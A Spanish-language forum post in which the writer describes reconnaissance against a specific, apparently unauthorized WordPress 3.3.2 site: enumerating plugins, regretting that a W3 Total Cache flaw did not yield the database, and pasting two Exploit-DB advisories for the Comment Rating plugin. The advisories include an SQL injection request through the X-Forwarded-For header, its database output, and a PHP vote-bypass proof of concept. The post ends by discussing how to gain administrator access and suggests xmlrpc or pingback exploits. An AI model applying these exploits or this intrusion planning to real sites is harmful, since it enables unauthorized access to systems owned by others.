Mira, de la misma web estuve intentando buscar alguna inyección sql que no te pida registro de usuario como la que encontraste, encontré esta:
wp-content/plugins/comment-rating/ck-processkarma.php
Si ingresas a wp-register verás el registro de wordpress (es un 3.3.2) y al ingresar verás el panel de usuario de wordpress, si le das un vistazo al código fuente podrás ver la mayoría de sus plugins:
....../wp-admin/load-styles.php?c=1&dir=ltr&load=admin-bar,wp-admin,wp-pointer&ver=1747f87854de3d4df3fdb74e9ef12757
....../wp-content/plugins/w3-total-cache/pub/css/widget.css?ver=3.3.2
....../wp-includes/js/thickbox/thickbox.css?ver=20111117
....../wp-admin/css/colors-fresh.css?ver=20111206
....../wp-admin/css/ie.css?ver=20111130
....../wp-content/plugins/youtube-embed/css/aye-admin.css?ver=3.3.2
....../wp-content/plugins/youtube-embed/css/aye-dynamic.css?ver=3.3.2
....../wp-content/plugins/youtube-embed/css/aye-tinymce-button.css?ver=3.3.2
....../wp-admin/load-scripts.php?c=1&load=jquery,utils&ver=edec3fab0cb6297ea474806db1895fa7
....../wp-content/plugins/comment-rating/ck-karma.js?ver=3.3.2
....../wp-content/plugins/w3-total-cache/pub/js/metadata.js?ver=3.3.2
....../wp-content/plugins/w3-total-cache/pub/js/widget.js?ver=3.3.2
....../wp-content/plugins/microkids-related-posts/microkids-related-posts.js
Los que mas se destacan por sus vulnerabilidades son w3-total-cache y comment-rating pero el de total caché no funciona porque no tiene puesta la opción de visualizar directorios (o si no ya hubieramos tenido la db), la de comment-rating si es posible explotar:
http://webcache.googleusercontent.com/search?q=cache:Y5z03qapzdQJ:www.exploit-db.com/exploits/24552/+&cd=1&hl=es&ct=clnk&gl=cl&client=firefox-a# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49 if(strstr($row['ck_ips'], $ip)) {
50 // die('error|You have already voted on this item!');
51 // Just don't count duplicated votes
52 $duplicated = 1;
53 $ck_ips = $row['ck_ips'];
54 }
Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";
So let's take a look in the DB
mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
| 2 | ,20.209.10.130 | 1 | 0 |
| 3 | | 0 | 0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)
Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header:
GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive
And the result is:
mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
| 2 | wordpress@localhost | 2 | 0 |
| 3 | | 0 | 0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)
Cheers
=======================================================================================
# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49 if(strstr($row['ck_ips'], $ip)) {
50 // die('error|You have already voted on this item!');
51 // Just don't count duplicated votes
52 $duplicated = 1;
53 $ck_ips = $row['ck_ips'];
54 }
Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";
Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request.
A simple POC is made in php.
<?PHP
define('HOST','http://localhost/wordpress/'); define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT
.'&action=add&path=a&imgIndex=1_14_'); for($i=0;$i<1;$i++) lvlup();
function lvlup(){
global $url;
$header = "GET ".URL." HTTP/1.1 \r\n";
$header.= "Host: ".$url['host']."\r\n";
$header.= "Accept-Encoding: gzip, deflate \r\n";
$header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n"; $header.= "Connection: close \r\n\r\n";
}
?>
El problema es que es una inyección muy muy dificil de explotar como para poder sacar probechos de ella y ganar algunos privilegios ya que está escrita sobre un update y no se puede concatenar una segunda instrucción para hacer otro update o un insert y poder hacer tu usuario un administrador, lo unico que se puede es crear un select entre parentesis pero los resultados se van directamente a una columna de la base de datos que nunca ves, asi que no sirve de mucho.
Dale un vistazo a las vulnerabilidades de Wordpress de las versiones entre la que está instalada y la última estable.
Creo que había un exploit para aprobecharse del pingback o del xmlrpc, no lo recuerdo bien.
Saludos.